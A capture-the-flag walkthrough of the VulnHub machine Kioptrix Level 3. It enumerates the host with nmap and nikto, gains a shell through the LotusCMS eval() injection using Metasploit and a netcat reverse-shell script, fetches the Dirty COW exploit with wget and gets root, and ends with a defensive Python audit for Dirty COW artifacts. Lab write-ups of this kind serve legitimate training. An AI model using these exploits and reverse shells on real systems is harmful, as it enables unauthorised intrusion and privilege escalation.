Kioptrix Level 3 (VulnHub: Kioptrix: Level 1.2 (#3)) Walkthrough

This article is a walkthrough of Kioptrix Level 3 (VulnHub's "Kioptrix: Level 1.2 (#3)"), from enumeration to root.

Enumeration

Nmap

$ ipaddr=192.168.174.146
$ ports=$(nmap -p- --min-rate=1000 -T4 $ipaddr | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
$ nmap -sC -sV -p$ports $ipaddr
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-19 23:57 EDT
Nmap scan report for kioptrix3.com (192.168.174.146)
Host is up (0.00039s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.68 seconds

Only two services are exposed: SSH (OpenSSH 4.7p1) and HTTP (Apache 2.2.8 with PHP 5.2.4). The scan reports the host as kioptrix3.com, so the name resolves locally (presumably an /etc/hosts entry), which is why it can be used as RHOSTS later.

Nikto

Nikto finds no direct foothold, though it does flag the outdated Apache/PHP versions, an exposed /phpmyadmin/ directory and an active TRACE method.

$ nikto -h $ipaddr
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.174.146
+ Target Hostname:    192.168.174.146
+ Target Port:        80
+ Start Time:         2021-09-20 03:52:44 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Cookie PHPSESSID created without the httponly flag
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch.
+ Server may leak inodes via ETags, header found with file /favicon.ico, inode: 631780, size: 23126, mtime: Fri Jun  5 15:22:00 2009
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 7914 requests: 0 error(s) and 19 item(s) reported on remote host
+ End Time:           2021-09-20 03:53:12 (GMT-4) (28 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Web access

The web root hosts a blog built on LotusCMS.


searchsploit lists several public exploits for LotusCMS:

$ searchsploit Lotus CMS
--------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                             |  Path
--------------------------------------------------------------------------- ---------------------------------
Lotus CMS Fraise 3.0 - Local File Inclusion / Remote Code Execution        | php/webapps/15964.py
Lotus Core CMS 1.0.1 - Local File Inclusion                                | php/webapps/47985.txt
Lotus Core CMS 1.0.1 - Remote File Inclusion                               | php/webapps/5866.txt
LotusCMS 3.0 - 'eval()' Remote Command Execution (Metasploit)              | php/remote/18565.rb
LotusCMS 3.0.3 - Multiple Vulnerabilities                                  | php/webapps/16982.txt
--------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

OWASP Zap

OWASP ZAP reports a server-side code injection vulnerability in the page parameter.

Tampering with that parameter makes the target return a PHP eval() error, which confirms that user input reaches eval(). That points straight at the LotusCMS 3.0 'eval()' Remote Command Execution (Metasploit) entry from the searchsploit list.

Exploit

Either Metasploit or the exploit script Hood3dRob1n published on GitHub works:

GitHub - Hood3dRob1n/LotusCMS-Exploit: LotusCMS 3.0 eval() Remote Command Execution

Use Metasploit

First I run the module with its default payload, php/meterpreter/reverse_tcp, but no session comes back.

$ msfconsole
                                                  
 _                                                    _
/ \    /\         __                         _   __  /_/ __                                                  
| |\  / | _____   \ \           ___   _____ | | /  \ _   \ \                                                 
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | || | || | |- -|                                                
|_|   | | | _|__  | |_  / -\ __\ \   | |    | | \__/| |  | |_                                                
      |/  |____/  \___\/ /\ \\___/   \/     \__|    |_\  \___\                                               
                                                                                                             

       =[ metasploit v6.1.5-dev                           ]
+ -- --=[ 2163 exploits - 1147 auxiliary - 367 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]

Metasploit tip: Metasploit can be configured at startup, see 
msfconsole --help to learn more

msf6 > search LotusCMS

Matching Modules
================

   #  Name                              Disclosure Date  Rank       Check  Description
   -  ----                              ---------------  ----       -----  -----------
   0  exploit/multi/http/lcms_php_exec  2011-03-03       excellent  Yes    LotusCMS 3.0 eval() Remote Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/lcms_php_exec

msf6 > use exploit/multi/http/lcms_php_exec 
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/lcms_php_exec) >
msf6 exploit(multi/http/lcms_php_exec) > set RHOSTS kioptrix3.com
RHOSTS => kioptrix3.com
msf6 exploit(multi/http/lcms_php_exec) > set URI /
URI => /
msf6 exploit(multi/http/lcms_php_exec) > exploit

[*] Started reverse TCP handler on 192.168.174.132:4444 
[*] Using found page param: /index.php?page=index
[*] Sending exploit ...
[*] Exploit completed, but no session was created.

After that failure I switch the payload from php/meterpreter/reverse_tcp to generic/shell_reverse_tcp, which only needs the injected PHP to connect back and hand over a shell, with no Meterpreter stage to load on this old PHP build.

msf6 exploit(multi/http/lcms_php_exec) > set payload generic/shell_reverse_tcp
payload => generic/shell_reverse_tcp
msf6 exploit(multi/http/lcms_php_exec) > show options

Module options (exploit/multi/http/lcms_php_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   192.168.174.146  yes       The target host(s), see https://github.com/rapid7/metasploit-framewo
                                       rk/wiki/Using-Metasploit
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   URI      /                yes       URI
   VHOST                     no        HTTP server virtual host


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.174.132  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic LotusCMS 3.0


msf6 exploit(multi/http/lcms_php_exec) > exploit

[*] Started reverse TCP handler on 192.168.174.132:4444 
[*] Using found page param: /index.php?page=index
[*] Sending exploit ...
[*] Command shell session 1 opened (192.168.174.132:4444 -> 192.168.174.146:33062) at 2021-09-21 09:53:05 -0400

whoami
www-data

Success!!

Use Hood3dRob1n's Code

lotusRCE.sh takes the target IP address and the path under which LotusCMS is installed (here the web root, /).

Before running it, start a listener on the attacking machine, for example nc -l -p 4242.

$./lotusRCE.sh  192.168.174.146 /
Path found, now to check for vuln....

</html>Hood3dRob1n
Regex found, site is vulnerable to PHP Code Injection!

About to try and inject reverse shell....
what IP to use?
192.168.174.132
What PORT?
4242

OK, open your local listener and choose the method for back connect: 
1) NetCat -e
2) NetCat /dev/tcp
3) NetCat Backpipe
4) NetCat FIFO
5) Exit
#? 1

After choosing option 1 (nc -e), the listener started earlier receives the shell:

$ nc -l -p 4242
whoami
www-data

Privilege Escalation

The raw reverse shell is awkward to work in, so I upgrade it to a TTY with Python:

python -c 'import pty; pty.spawn("/bin/bash")'
www-data@Kioptrix3:/home/www/kioptrix3.com$ 

Next, OS information: the target runs Linux kernel 2.6.24 (i686, built in 2009).

$ uname -a
uname -a
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux

Dirty COW (CVE-2016-5195, Exploit-DB 40839) applies: the bug is present from kernel 2.6.22 until the fixes released in October 2016, and 2.6.24 falls inside that range. 40839.c backs up /etc/passwd to /tmp/passwd.bak, then races a write to /proc/self/mem against madvise() to overwrite the first entry (root's) with a new uid-0 user named firefart whose password is given on the command line. Being a race, it can need more than one attempt and can leave the kernel unstable, so snapshot the VM first.

www-data@Kioptrix3:/home/www/kioptrix3.com$ cd /tmp
www-data@Kioptrix3:/tmp$ wget http://192.168.174.132/40839.c
wget http://192.168.174.132/40839.c
--08:00:03--  http://192.168.174.132/40839.c
           => `40839.c'
Connecting to 192.168.174.132:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4,814 (4.7K) [text/x-csrc]

100%[====================================>] 4,814         --.--K/s             

08:00:03 (884.92 MB/s) - `40839.c' saved [4814/4814]

www-data@Kioptrix3:/tmp$ gcc -pthread 40839.c -o dirty -lcrypt
www-data@Kioptrix3:/tmp$ ./dirty password
Complete line:
firefart:fijI1lDcvwk7k:0:0:pwned:/root:/bin/bash

mmap: b7fe0000
$ su firefart
Password: password

firefart@Kioptrix3:/home/www/kioptrix3.com# id
uid=0(firefart) gid=0(root) groups=0(root)
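Two checks I would add around the Dirty COW step, as an added example that is not part of the original post or of 40839.c: a first-pass kernel version triage for CVE-2016-5195, and an /etc/passwd audit that spots the artifact this exploit leaves behind (a uid-0 account that is not root, carrying its password hash inline). The fix-version list is limited to the mainline branches I am sure of and ignores distribution backports; the passwd sample is constructed, with the firefart line taken from the exploit output above.

```python
"""Dirty COW (CVE-2016-5195) triage and post-exploitation /etc/passwd audit.

Added example, not code from the original post or from 40839.c.
"""
import re

# Affected from 2.6.22; fixed in mainline in October 2016. Only the three
# branches listed are checked (assumption: enough for a first pass). Distro
# kernels backport the fix under older version strings, so confirm with the
# vendor advisory before trusting a "candidate" verdict.
DIRTYCOW_FIRST_AFFECTED = (2, 6, 22)
DIRTYCOW_FIXED_IN = [(4, 4, 26), (4, 7, 9), (4, 8, 3)]


def parse_kernel_release(uname_r: str) -> tuple:
    """'2.6.24-24-server' -> (2, 6, 24). A missing patch level defaults to 0."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", uname_r.strip())
    if not m:
        raise ValueError(f"unrecognised kernel release: {uname_r!r}")
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def dirtycow_candidate(uname_r: str) -> bool:
    """True if the version string alone does not rule CVE-2016-5195 out."""
    v = parse_kernel_release(uname_r)
    if v < DIRTYCOW_FIRST_AFFECTED:
        return False
    for fixed in DIRTYCOW_FIXED_IN:
        if v[:2] == fixed[:2] and v >= fixed:
            return False
    return True


def passwd_entries(passwd_text: str):
    """Yield the seven passwd fields we care about; skip blanks and comments."""
    for line in passwd_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        f = line.split(":")
        if len(f) != 7:
            continue  # malformed line; a stricter audit would flag this too
        yield {"name": f[0], "pw": f[1], "uid": f[2], "gid": f[3], "shell": f[6]}


def uid0_accounts(passwd_text: str) -> list:
    return [e["name"] for e in passwd_entries(passwd_text) if e["uid"] == "0"]


def inline_hash_accounts(passwd_text: str) -> list:
    """Accounts whose hash lives in /etc/passwd instead of /etc/shadow."""
    return [e["name"] for e in passwd_entries(passwd_text)
            if e["pw"] not in ("x", "*", "!", "")]


def audit_passwd(passwd_text: str) -> dict:
    """Summarise the tell-tale signs of the /etc/passwd overwrite method."""
    uid0 = uid0_accounts(passwd_text)
    return {
        "uid0": uid0,
        "extra_uid0": [n for n in uid0 if n != "root"],
        "root_missing": "root" not in uid0,
        "inline_hashes": inline_hash_accounts(passwd_text),
    }


# Constructed sample of /etc/passwd after 40839 has overwritten the first
# (root) entry; the firefart line is the one printed by the exploit above.
SAMPLE_PASSWD_AFTER = """\
firefart:fijI1lDcvwk7k:0:0:pwned:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
"""

if __name__ == "__main__":
    print("candidate:", dirtycow_candidate("2.6.24-24-server"))
    print(audit_passwd(SAMPLE_PASSWD_AFTER))
```

On the defensive side the same audit is cheap to run periodically: any uid-0 name other than root, a root entry that has vanished, or a hash sitting in /etc/passwd rather than /etc/shadow is worth an alert on its own, and the exploit's /tmp/passwd.bak is a second artifact to look for.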

id confirms uid 0, i.e. full root, not merely membership of the root group. To leave the box as found, restore the original file with mv /tmp/passwd.bak /etc/passwd. That's all.